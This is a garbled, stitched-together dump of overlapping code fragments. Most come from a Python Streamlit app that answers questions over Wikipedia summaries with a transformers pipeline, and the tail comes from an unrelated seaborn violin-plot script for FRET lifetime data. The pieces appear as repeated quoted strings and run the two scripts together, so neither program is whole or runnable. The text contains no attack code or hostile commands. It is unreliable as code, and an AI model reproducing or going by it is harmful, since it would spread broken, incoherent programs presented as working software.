summary = wikipedia.summary(results[0],", "wikipedia import warnings import streamlit as st warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query: str) -> str:", "try: summary = wikipedia.summary(results[0], sentences=10) except wikipedia.DisambiguationError as e: ambiguous_terms = e.options #", "get_context_from_wiki(query) paragraph_slot.markdown(context) elif add_select_option == \"Paragraph based\": question = st.empty() context = st.text_area(\"Enter", "due to Disambiguation issue try: summary = wikipedia.summary(results[0], sentences=10) except wikipedia.DisambiguationError as e:", "query = st.text_area(\"WIKI SEARCH TERM\", \"\") if query: context = get_context_from_wiki(query) paragraph_slot.markdown(context) elif", "st.text_input(\"QUESTION\", \"\") # print(f\"Context: {context}\\n\") # print(f\"Question: {question}\\n\") # print(answer_question(pipeline, question=question, context=context)) if", "= st.empty() context = st.text_area(\"Enter the paragraph to explore\", value=\"...\") question = st.text_input(\"QUESTION\",", "def answer_question(pipeline, question, context): result = pipeline(question=question, context=context) #return f\"Answer: {result['answer']}, score: {round(result['score'],", "context = st.text_area(\"Enter the paragraph to explore\", value=\"...\") question = st.text_input(\"QUESTION\", \"\") #", "question = st.empty() context = st.text_area(\"Enter the paragraph to explore\", value=\"...\") question =", "print(f\"Question: {question}\\n\") # print(answer_question(pipeline, question=question, context=context)) if question: try: answer = answer_question(pipeline, question=question,", "import wikipedia import warnings import streamlit as st warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query: str) ->", "from the list of ambiguous terms and try again return wikipedia.summary(ambiguous_terms[0], sentences=10) return", "as e: ambiguous_terms = e.options # take the first one from the list", "question: try: answer = answer_question(pipeline, question=question, context=context) st.write(answer['answer']) except: st.write(\"Provide a valid paragraph\")", "context): result = pipeline(question=question, context=context) #return f\"Answer: {result['answer']}, score: {round(result['score'], 4)}, start: {result['start']},", "summary about the query from wikipedia\" results = wikipedia.search(query) # There could be", "summary def get_qa_pipeline(): qa_pipeline = pipeline(\"question-answering\") return qa_pipeline def answer_question(pipeline, question, context): result", "qa_pipeline = pipeline(\"question-answering\") return qa_pipeline def answer_question(pipeline, question, context): result = pipeline(question=question, context=context)", "wikipedia.summary(results[0], sentences=10) except wikipedia.DisambiguationError as e: ambiguous_terms = e.options # take the first", "take the first one from the list of ambiguous terms and try again", "def get_context_from_wiki(query: str) -> str: \"Given a query, return the summary about the", "There could be more than 1 due to Disambiguation issue try: summary =", "the first one from the list of ambiguous terms and try again return", "#return f\"Answer: {result['answer']}, score: {round(result['score'], 4)}, start: {result['start']}, end: {result['end']}\" return result if", "= wikipedia.search(query) # There could be more than 1 due to Disambiguation issue", "return wikipedia.summary(ambiguous_terms[0], sentences=10) return summary def get_qa_pipeline(): qa_pipeline = pipeline(\"question-answering\") return qa_pipeline def", "transformers import pipeline import wikipedia import warnings import streamlit as st warnings.filterwarnings(\"ignore\") def", "st.empty() query = st.text_area(\"WIKI SEARCH TERM\", \"\") if query: context = get_context_from_wiki(query) paragraph_slot.markdown(context)", ") if add_select_option == \"Query Based\": paragraph_slot = st.empty() query = st.text_area(\"WIKI SEARCH", "st warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query: str) -> str: \"Given a query, return the summary", "explore\", value=\"...\") question = st.text_input(\"QUESTION\", \"\") # print(f\"Context: {context}\\n\") # print(f\"Question: {question}\\n\") #", "= pipeline(\"question-answering\") return qa_pipeline def answer_question(pipeline, question, context): result = pipeline(question=question, context=context) #return", "== \"Query Based\": paragraph_slot = st.empty() query = st.text_area(\"WIKI SEARCH TERM\", \"\") if", "{result['answer']}, score: {round(result['score'], 4)}, start: {result['start']}, end: {result['end']}\" return result if __name__ ==", "str: \"Given a query, return the summary about the query from wikipedia\" results", "elif add_select_option == \"Paragraph based\": question = st.empty() context = st.text_area(\"Enter the paragraph", "pipeline = get_qa_pipeline() add_select_option = st.sidebar.selectbox( \"Exploration Options\", (\"Query Based\", \"Paragraph based\") )", "# print(answer_question(pipeline, question=question, context=context)) if question: try: answer = answer_question(pipeline, question=question, context=context) st.write(answer['answer'])", "st.text_area(\"Enter the paragraph to explore\", value=\"...\") question = st.text_input(\"QUESTION\", \"\") # print(f\"Context: {context}\\n\")", "print(answer_question(pipeline, question=question, context=context)) if question: try: answer = answer_question(pipeline, question=question, context=context) st.write(answer['answer']) except:", "{result['end']}\" return result if __name__ == '__main__': st.title(\"Extractive Question Answering\") pipeline = get_qa_pipeline()", "end: {result['end']}\" return result if __name__ == '__main__': st.title(\"Extractive Question Answering\") pipeline =", "result = pipeline(question=question, context=context) #return f\"Answer: {result['answer']}, score: {round(result['score'], 4)}, start: {result['start']}, end:", "import pipeline import wikipedia import warnings import streamlit as st warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query:", "\"\") # print(f\"Context: {context}\\n\") # print(f\"Question: {question}\\n\") # print(answer_question(pipeline, question=question, context=context)) if question:", "add_select_option = st.sidebar.selectbox( \"Exploration Options\", (\"Query Based\", \"Paragraph based\") ) if add_select_option ==", "of ambiguous terms and try again return wikipedia.summary(ambiguous_terms[0], sentences=10) return summary def get_qa_pipeline():", "the query from wikipedia\" results = wikipedia.search(query) # There could be more than", "query: context = get_context_from_wiki(query) paragraph_slot.markdown(context) elif add_select_option == \"Paragraph based\": question = st.empty()", "= get_context_from_wiki(query) paragraph_slot.markdown(context) elif add_select_option == \"Paragraph based\": question = st.empty() context =", "ambiguous_terms = e.options # take the first one from the list of ambiguous", "= st.text_area(\"WIKI SEARCH TERM\", \"\") if query: context = get_context_from_wiki(query) paragraph_slot.markdown(context) elif add_select_option", "# print(f\"Context: {context}\\n\") # print(f\"Question: {question}\\n\") # print(answer_question(pipeline, question=question, context=context)) if question: try:", "if __name__ == '__main__': st.title(\"Extractive Question Answering\") pipeline = get_qa_pipeline() add_select_option = st.sidebar.selectbox(", "\"Paragraph based\": question = st.empty() context = st.text_area(\"Enter the paragraph to explore\", value=\"...\")", "qa_pipeline def answer_question(pipeline, question, context): result = pipeline(question=question, context=context) #return f\"Answer: {result['answer']}, score:", "based\": question = st.empty() context = st.text_area(\"Enter the paragraph to explore\", value=\"...\") question", "query, return the summary about the query from wikipedia\" results = wikipedia.search(query) #", "= wikipedia.summary(results[0], sentences=10) except wikipedia.DisambiguationError as e: ambiguous_terms = e.options # take the", "4)}, start: {result['start']}, end: {result['end']}\" return result if __name__ == '__main__': st.title(\"Extractive Question", "get_qa_pipeline() add_select_option = st.sidebar.selectbox( \"Exploration Options\", (\"Query Based\", \"Paragraph based\") ) if add_select_option", "the list of ambiguous terms and try again return wikipedia.summary(ambiguous_terms[0], sentences=10) return summary", "if add_select_option == \"Query Based\": paragraph_slot = st.empty() query = st.text_area(\"WIKI SEARCH TERM\",", "wikipedia.DisambiguationError as e: ambiguous_terms = e.options # take the first one from the", "= pipeline(question=question, context=context) #return f\"Answer: {result['answer']}, score: {round(result['score'], 4)}, start: {result['start']}, end: {result['end']}\"", "paragraph_slot.markdown(context) elif add_select_option == \"Paragraph based\": question = st.empty() context = st.text_area(\"Enter the", "== \"Paragraph based\": question = st.empty() context = st.text_area(\"Enter the paragraph to explore\",", "= st.sidebar.selectbox( \"Exploration Options\", (\"Query Based\", \"Paragraph based\") ) if add_select_option == \"Query", "str) -> str: \"Given a query, return the summary about the query from", "value=\"...\") question = st.text_input(\"QUESTION\", \"\") # print(f\"Context: {context}\\n\") # print(f\"Question: {question}\\n\") # print(answer_question(pipeline,", "wikipedia.search(query) # There could be more than 1 due to Disambiguation issue try:", "terms and try again return wikipedia.summary(ambiguous_terms[0], sentences=10) return summary def get_qa_pipeline(): qa_pipeline =", "f\"Answer: {result['answer']}, score: {round(result['score'], 4)}, start: {result['start']}, end: {result['end']}\" return result if __name__", "add_select_option == \"Query Based\": paragraph_slot = st.empty() query = st.text_area(\"WIKI SEARCH TERM\", \"\")", "paragraph to explore\", value=\"...\") question = st.text_input(\"QUESTION\", \"\") # print(f\"Context: {context}\\n\") # print(f\"Question:", "from wikipedia\" results = wikipedia.search(query) # There could be more than 1 due", "summary = wikipedia.summary(results[0], sentences=10) except wikipedia.DisambiguationError as e: ambiguous_terms = e.options # take", "warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query: str) -> str: \"Given a query, return the summary about", "a query, return the summary about the query from wikipedia\" results = wikipedia.search(query)", "get_context_from_wiki(query: str) -> str: \"Given a query, return the summary about the query", "sentences=10) except wikipedia.DisambiguationError as e: ambiguous_terms = e.options # take the first one", "more than 1 due to Disambiguation issue try: summary = wikipedia.summary(results[0], sentences=10) except", "ambiguous terms and try again return wikipedia.summary(ambiguous_terms[0], sentences=10) return summary def get_qa_pipeline(): qa_pipeline", "add_select_option == \"Paragraph based\": question = st.empty() context = st.text_area(\"Enter the paragraph to", "context=context)) if question: try: answer = answer_question(pipeline, question=question, context=context) st.write(answer['answer']) except: st.write(\"Provide a", "context=context) #return f\"Answer: {result['answer']}, score: {round(result['score'], 4)}, start: {result['start']}, end: {result['end']}\" return result", "to explore\", value=\"...\") question = st.text_input(\"QUESTION\", \"\") # print(f\"Context: {context}\\n\") # print(f\"Question: {question}\\n\")", "answer_question(pipeline, question, context): result = pipeline(question=question, context=context) #return f\"Answer: {result['answer']}, score: {round(result['score'], 4)},", "get_qa_pipeline(): qa_pipeline = pipeline(\"question-answering\") return qa_pipeline def answer_question(pipeline, question, context): result = pipeline(question=question,", "import streamlit as st warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query: str) -> str: \"Given a query,", "{question}\\n\") # print(answer_question(pipeline, question=question, context=context)) if question: try: answer = answer_question(pipeline, question=question, context=context)", "return the summary about the query from wikipedia\" results = wikipedia.search(query) # There", "{round(result['score'], 4)}, start: {result['start']}, end: {result['end']}\" return result if __name__ == '__main__': st.title(\"Extractive", "about the query from wikipedia\" results = wikipedia.search(query) # There could be more", "\"Given a query, return the summary about the query from wikipedia\" results =", "= st.text_area(\"Enter the paragraph to explore\", value=\"...\") question = st.text_input(\"QUESTION\", \"\") # print(f\"Context:", "result if __name__ == '__main__': st.title(\"Extractive Question Answering\") pipeline = get_qa_pipeline() add_select_option =", "import warnings import streamlit as st warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query: str) -> str: \"Given", "results = wikipedia.search(query) # There could be more than 1 due to Disambiguation", "based\") ) if add_select_option == \"Query Based\": paragraph_slot = st.empty() query = st.text_area(\"WIKI", "pipeline(question=question, context=context) #return f\"Answer: {result['answer']}, score: {round(result['score'], 4)}, start: {result['start']}, end: {result['end']}\" return", "be more than 1 due to Disambiguation issue try: summary = wikipedia.summary(results[0], sentences=10)", "warnings import streamlit as st warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query: str) -> str: \"Given a", "and try again return wikipedia.summary(ambiguous_terms[0], sentences=10) return summary def get_qa_pipeline(): qa_pipeline = pipeline(\"question-answering\")", "try again return wikipedia.summary(ambiguous_terms[0], sentences=10) return summary def get_qa_pipeline(): qa_pipeline = pipeline(\"question-answering\") return", "than 1 due to Disambiguation issue try: summary = wikipedia.summary(results[0], sentences=10) except wikipedia.DisambiguationError", "question, context): result = pipeline(question=question, context=context) #return f\"Answer: {result['answer']}, score: {round(result['score'], 4)}, start:", "st.empty() context = st.text_area(\"Enter the paragraph to explore\", value=\"...\") question = st.text_input(\"QUESTION\", \"\")", "pipeline(\"question-answering\") return qa_pipeline def answer_question(pipeline, question, context): result = pipeline(question=question, context=context) #return f\"Answer:", "wikipedia.summary(ambiguous_terms[0], sentences=10) return summary def get_qa_pipeline(): qa_pipeline = pipeline(\"question-answering\") return qa_pipeline def answer_question(pipeline,", "= st.text_input(\"QUESTION\", \"\") # print(f\"Context: {context}\\n\") # print(f\"Question: {question}\\n\") # print(answer_question(pipeline, question=question, context=context))", "if question: try: answer = answer_question(pipeline, question=question, context=context) st.write(answer['answer']) except: st.write(\"Provide a valid", "the paragraph to explore\", value=\"...\") question = st.text_input(\"QUESTION\", \"\") # print(f\"Context: {context}\\n\") #", "\"Exploration Options\", (\"Query Based\", \"Paragraph based\") ) if add_select_option == \"Query Based\": paragraph_slot", "if query: context = get_context_from_wiki(query) paragraph_slot.markdown(context) elif add_select_option == \"Paragraph based\": question =", "st.sidebar.selectbox( \"Exploration Options\", (\"Query Based\", \"Paragraph based\") ) if add_select_option == \"Query Based\":", "\"Query Based\": paragraph_slot = st.empty() query = st.text_area(\"WIKI SEARCH TERM\", \"\") if query:", "context = get_context_from_wiki(query) paragraph_slot.markdown(context) elif add_select_option == \"Paragraph based\": question = st.empty() context", "st.text_area(\"WIKI SEARCH TERM\", \"\") if query: context = get_context_from_wiki(query) paragraph_slot.markdown(context) elif add_select_option ==", "(\"Query Based\", \"Paragraph based\") ) if add_select_option == \"Query Based\": paragraph_slot = st.empty()", "# take the first one from the list of ambiguous terms and try", "sentences=10) return summary def get_qa_pipeline(): qa_pipeline = pipeline(\"question-answering\") return qa_pipeline def answer_question(pipeline, question,", "issue try: summary = wikipedia.summary(results[0], sentences=10) except wikipedia.DisambiguationError as e: ambiguous_terms = e.options", "again return wikipedia.summary(ambiguous_terms[0], sentences=10) return summary def get_qa_pipeline(): qa_pipeline = pipeline(\"question-answering\") return qa_pipeline", "list of ambiguous terms and try again return wikipedia.summary(ambiguous_terms[0], sentences=10) return summary def", "query from wikipedia\" results = wikipedia.search(query) # There could be more than 1", "# print(f\"Question: {question}\\n\") # print(answer_question(pipeline, question=question, context=context)) if question: try: answer = answer_question(pipeline,", "-> str: \"Given a query, return the summary about the query from wikipedia\"", "Based\": paragraph_slot = st.empty() query = st.text_area(\"WIKI SEARCH TERM\", \"\") if query: context", "'__main__': st.title(\"Extractive Question Answering\") pipeline = get_qa_pipeline() add_select_option = st.sidebar.selectbox( \"Exploration Options\", (\"Query", "{result['start']}, end: {result['end']}\" return result if __name__ == '__main__': st.title(\"Extractive Question Answering\") pipeline", "{context}\\n\") # print(f\"Question: {question}\\n\") # print(answer_question(pipeline, question=question, context=context)) if question: try: answer =", "Options\", (\"Query Based\", \"Paragraph based\") ) if add_select_option == \"Query Based\": paragraph_slot =", "return qa_pipeline def answer_question(pipeline, question, context): result = pipeline(question=question, context=context) #return f\"Answer: {result['answer']},", "question = st.text_input(\"QUESTION\", \"\") # print(f\"Context: {context}\\n\") # print(f\"Question: {question}\\n\") # print(answer_question(pipeline, question=question,", "from transformers import pipeline import wikipedia import warnings import streamlit as st warnings.filterwarnings(\"ignore\")", "return result if __name__ == '__main__': st.title(\"Extractive Question Answering\") pipeline = get_qa_pipeline() add_select_option", "# There could be more than 1 due to Disambiguation issue try: summary", "except wikipedia.DisambiguationError as e: ambiguous_terms = e.options # take the first one from", "print(f\"Context: {context}\\n\") # print(f\"Question: {question}\\n\") # print(answer_question(pipeline, question=question, context=context)) if question: try: answer", "score: {round(result['score'], 4)}, start: {result['start']}, end: {result['end']}\" return result if __name__ == '__main__':", "Question Answering\") pipeline = get_qa_pipeline() add_select_option = st.sidebar.selectbox( \"Exploration Options\", (\"Query Based\", \"Paragraph", "one from the list of ambiguous terms and try again return wikipedia.summary(ambiguous_terms[0], sentences=10)", "return summary def get_qa_pipeline(): qa_pipeline = pipeline(\"question-answering\") return qa_pipeline def answer_question(pipeline, question, context):", "streamlit as st warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query: str) -> str: \"Given a query, return", "Answering\") pipeline = get_qa_pipeline() add_select_option = st.sidebar.selectbox( \"Exploration Options\", (\"Query Based\", \"Paragraph based\")", "as st warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query: str) -> str: \"Given a query, return the", "= get_qa_pipeline() add_select_option = st.sidebar.selectbox( \"Exploration Options\", (\"Query Based\", \"Paragraph based\") ) if", "e.options # take the first one from the list of ambiguous terms and" ]
[ "import By from selenium.webdriver.support.select import Select from selenium.webdriver.support.wait import WebDriverWait from common.webdriver_factory import", "selenium.webdriver.support.select import Select from selenium.webdriver.support.wait import WebDriverWait from common.webdriver_factory import get_driver from selenium.webdriver.support", "WebDriverWait(driver, 20) search_locator = (By.ID, 'search') search_box = wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\") search_btn_locator = (By.ID,", "import Select from selenium.webdriver.support.wait import WebDriverWait from common.webdriver_factory import get_driver from selenium.webdriver.support import", "= wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\") search_btn_locator = (By.ID, 'search-icon-legacy') search_button = wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator =", "= [By.ID, 'video-title'] results = wait.until(EC.visibility_of_all_elements_located(results_locator)) print(f'Titulos: {len(results)}') for result in results: print(result.text)", "search_button.click() results_locator = [By.ID, 'video-title'] results = wait.until(EC.visibility_of_all_elements_located(results_locator)) print(f'Titulos: {len(results)}') for result in", "import WebDriverWait from common.webdriver_factory import get_driver from selenium.webdriver.support import expected_conditions as EC driver", "import expected_conditions as EC driver = get_driver('chrome') driver.get('https://www.youtube.com/') wait = WebDriverWait(driver, 20) search_locator", "get_driver('chrome') driver.get('https://www.youtube.com/') wait = WebDriverWait(driver, 20) search_locator = (By.ID, 'search') search_box = wait.until(EC.element_to_be_clickable(search_locator))", "wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator = [By.ID, 'video-title'] results = wait.until(EC.visibility_of_all_elements_located(results_locator)) print(f'Titulos: {len(results)}') for result", "(By.ID, 'search') search_box = wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\") search_btn_locator = (By.ID, 'search-icon-legacy') search_button = wait.until(EC.element_to_be_clickable(search_btn_locator))", "= (By.ID, 'search-icon-legacy') search_button = wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator = [By.ID, 'video-title'] results =", "search_button = wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator = [By.ID, 'video-title'] results = wait.until(EC.visibility_of_all_elements_located(results_locator)) print(f'Titulos: {len(results)}')", "Select from selenium.webdriver.support.wait import WebDriverWait from common.webdriver_factory import get_driver from selenium.webdriver.support import expected_conditions", "from common.webdriver_factory import get_driver from selenium.webdriver.support import expected_conditions as EC driver = get_driver('chrome')", "'search') search_box = wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\") search_btn_locator = (By.ID, 'search-icon-legacy') search_button = wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click()", "driver.get('https://www.youtube.com/') wait = WebDriverWait(driver, 20) search_locator = (By.ID, 'search') search_box = wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\")", "import get_driver from selenium.webdriver.support import expected_conditions as EC driver = get_driver('chrome') driver.get('https://www.youtube.com/') wait", "from selenium.webdriver.support import expected_conditions as EC driver = get_driver('chrome') driver.get('https://www.youtube.com/') wait = WebDriverWait(driver,", "selenium.webdriver.support import expected_conditions as EC driver = get_driver('chrome') driver.get('https://www.youtube.com/') wait = WebDriverWait(driver, 20)", "selenium.webdriver.common.by import By from selenium.webdriver.support.select import Select from selenium.webdriver.support.wait import WebDriverWait from common.webdriver_factory", "<gh_stars>0 from selenium.webdriver.common.by import By from selenium.webdriver.support.select import Select from selenium.webdriver.support.wait import WebDriverWait", "wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\") search_btn_locator = (By.ID, 'search-icon-legacy') search_button = wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator = [By.ID,", "common.webdriver_factory import get_driver from selenium.webdriver.support import expected_conditions as EC driver = get_driver('chrome') driver.get('https://www.youtube.com/')", "selenium.webdriver.support.wait import WebDriverWait from common.webdriver_factory import get_driver from selenium.webdriver.support import expected_conditions as EC", "driver = get_driver('chrome') driver.get('https://www.youtube.com/') wait = WebDriverWait(driver, 20) search_locator = (By.ID, 'search') search_box", "'search-icon-legacy') search_button = wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator = [By.ID, 'video-title'] results = wait.until(EC.visibility_of_all_elements_located(results_locator)) print(f'Titulos:", "WebDriverWait from common.webdriver_factory import get_driver from selenium.webdriver.support import expected_conditions as EC driver =", "EC driver = get_driver('chrome') driver.get('https://www.youtube.com/') wait = WebDriverWait(driver, 20) search_locator = (By.ID, 'search')", "as EC driver = get_driver('chrome') driver.get('https://www.youtube.com/') wait = WebDriverWait(driver, 20) search_locator = (By.ID,", "search_btn_locator = (By.ID, 'search-icon-legacy') search_button = wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator = [By.ID, 'video-title'] results", "search_locator = (By.ID, 'search') search_box = wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\") search_btn_locator = (By.ID, 'search-icon-legacy') search_button", "By from selenium.webdriver.support.select import Select from selenium.webdriver.support.wait import WebDriverWait from common.webdriver_factory import get_driver", "get_driver from selenium.webdriver.support import expected_conditions as EC driver = get_driver('chrome') driver.get('https://www.youtube.com/') wait =", "= wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator = [By.ID, 'video-title'] results = wait.until(EC.visibility_of_all_elements_located(results_locator)) print(f'Titulos: {len(results)}') for", "= WebDriverWait(driver, 20) search_locator = (By.ID, 'search') search_box = wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\") search_btn_locator =", "[By.ID, 'video-title'] results = wait.until(EC.visibility_of_all_elements_located(results_locator)) print(f'Titulos: {len(results)}') for result in results: print(result.text) driver.quit()", "results_locator = [By.ID, 'video-title'] results = wait.until(EC.visibility_of_all_elements_located(results_locator)) print(f'Titulos: {len(results)}') for result in results:", "20) search_locator = (By.ID, 'search') search_box = wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\") search_btn_locator = (By.ID, 'search-icon-legacy')", "from selenium.webdriver.support.wait import WebDriverWait from common.webdriver_factory import get_driver from selenium.webdriver.support import expected_conditions as", "wait = WebDriverWait(driver, 20) search_locator = (By.ID, 'search') search_box = wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\") search_btn_locator", "expected_conditions as EC driver = get_driver('chrome') driver.get('https://www.youtube.com/') wait = WebDriverWait(driver, 20) search_locator =", "(By.ID, 'search-icon-legacy') search_button = wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator = [By.ID, 'video-title'] results = wait.until(EC.visibility_of_all_elements_located(results_locator))", "= (By.ID, 'search') search_box = wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\") search_btn_locator = (By.ID, 'search-icon-legacy') search_button =", "from selenium.webdriver.common.by import By from selenium.webdriver.support.select import Select from selenium.webdriver.support.wait import WebDriverWait from", "search_box.send_keys(\"<PASSWORD>\") search_btn_locator = (By.ID, 'search-icon-legacy') search_button = wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator = [By.ID, 'video-title']", "from selenium.webdriver.support.select import Select from selenium.webdriver.support.wait import WebDriverWait from common.webdriver_factory import get_driver from", "search_box = wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\") search_btn_locator = (By.ID, 'search-icon-legacy') search_button = wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator", "= get_driver('chrome') driver.get('https://www.youtube.com/') wait = WebDriverWait(driver, 20) search_locator = (By.ID, 'search') search_box =" ]
[ "price = 0.0, hasDiscount = False, hasError = False, isIndisponible = False ):", "): self.title = title self.price = price self.hasDiscount = hasDiscount self.hasError = hasError", "0.0, hasDiscount = False, hasError = False, isIndisponible = False ): self.title =", "False, isIndisponible = False ): self.title = title self.price = price self.hasDiscount =", "title self.price = price self.hasDiscount = hasDiscount self.hasError = hasError self.isIndisponible = isIndisponible", "False, hasError = False, isIndisponible = False ): self.title = title self.price =", "__init__( self, title = '', price = 0.0, hasDiscount = False, hasError =", "ProductModel: def __init__( self, title = '', price = 0.0, hasDiscount = False,", "isIndisponible = False ): self.title = title self.price = price self.hasDiscount = hasDiscount", "= False ): self.title = title self.price = price self.hasDiscount = hasDiscount self.hasError", "= False, hasError = False, isIndisponible = False ): self.title = title self.price", "def __init__( self, title = '', price = 0.0, hasDiscount = False, hasError", "self, title = '', price = 0.0, hasDiscount = False, hasError = False,", "False ): self.title = title self.price = price self.hasDiscount = hasDiscount self.hasError =", "= 0.0, hasDiscount = False, hasError = False, isIndisponible = False ): self.title", "= '', price = 0.0, hasDiscount = False, hasError = False, isIndisponible =", "hasDiscount = False, hasError = False, isIndisponible = False ): self.title = title", "class ProductModel: def __init__( self, title = '', price = 0.0, hasDiscount =", "self.title = title self.price = price self.hasDiscount = hasDiscount self.hasError = hasError self.isIndisponible", "= title self.price = price self.hasDiscount = hasDiscount self.hasError = hasError self.isIndisponible =", "hasError = False, isIndisponible = False ): self.title = title self.price = price", "'', price = 0.0, hasDiscount = False, hasError = False, isIndisponible = False", "title = '', price = 0.0, hasDiscount = False, hasError = False, isIndisponible", "= False, isIndisponible = False ): self.title = title self.price = price self.hasDiscount", "<filename>src/sites/product_model.py<gh_stars>1-10 class ProductModel: def __init__( self, title = '', price = 0.0, hasDiscount" ]
[ "paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1 =", "df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1 = df.iloc[:,4:7] # df1", "2021 @author: ribis \"\"\" import pandas as pd import numpy as np import", "import matplotlib.pyplot as plt df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df", "Sep 25 11:19:10 2021 @author: ribis \"\"\" import pandas as pd import numpy", "np import seaborn as sns import matplotlib.pyplot as plt df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd", "df1 = df.iloc[:,4:7] # df1 = df.iloc[:,0:4] # df1 = df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\")", "FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1 = df.iloc[:,4:7] # df1 = df.iloc[:,0:4] # df1", "= df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0) # sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45, ha=\"right\") plt.ylabel(\"Time", "Created on Sat Sep 25 11:19:10 2021 @author: ribis \"\"\" import pandas as", "\"\"\" import pandas as pd import numpy as np import seaborn as sns", "sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0) # sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45, ha=\"right\") plt.ylabel(\"Time (s)\") plt.ylim(0, 80)", "-*- coding: utf-8 -*- \"\"\" Created on Sat Sep 25 11:19:10 2021 @author:", "25 11:19:10 2021 @author: ribis \"\"\" import pandas as pd import numpy as", "cut=0) # sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45, ha=\"right\") plt.ylabel(\"Time (s)\") plt.ylim(0, 80) plt.savefig(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET", "# sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45, ha=\"right\") plt.ylabel(\"Time (s)\") plt.ylim(0, 80) plt.savefig(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer", "sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45, ha=\"right\") plt.ylabel(\"Time (s)\") plt.ylim(0, 80) plt.savefig(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/vioplot_p35_p5_NusG.eps\",", "# -*- coding: utf-8 -*- \"\"\" Created on Sat Sep 25 11:19:10 2021", "project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1 = df.iloc[:,4:7] # df1 = df.iloc[:,0:4] #", "import seaborn as sns import matplotlib.pyplot as plt df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET", "= pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer", "<filename>MFD_vio_plot.py # -*- coding: utf-8 -*- \"\"\" Created on Sat Sep 25 11:19:10", "# df1 = df.iloc[:,4:7] # df1 = df.iloc[:,0:4] # df1 = df.iloc[:,7:16] print(df1.head)", "df.iloc[:,4:7] # df1 = df.iloc[:,0:4] # df1 = df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1,", "project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") #", "df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET", "import numpy as np import seaborn as sns import matplotlib.pyplot as plt df", "as sns import matplotlib.pyplot as plt df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET 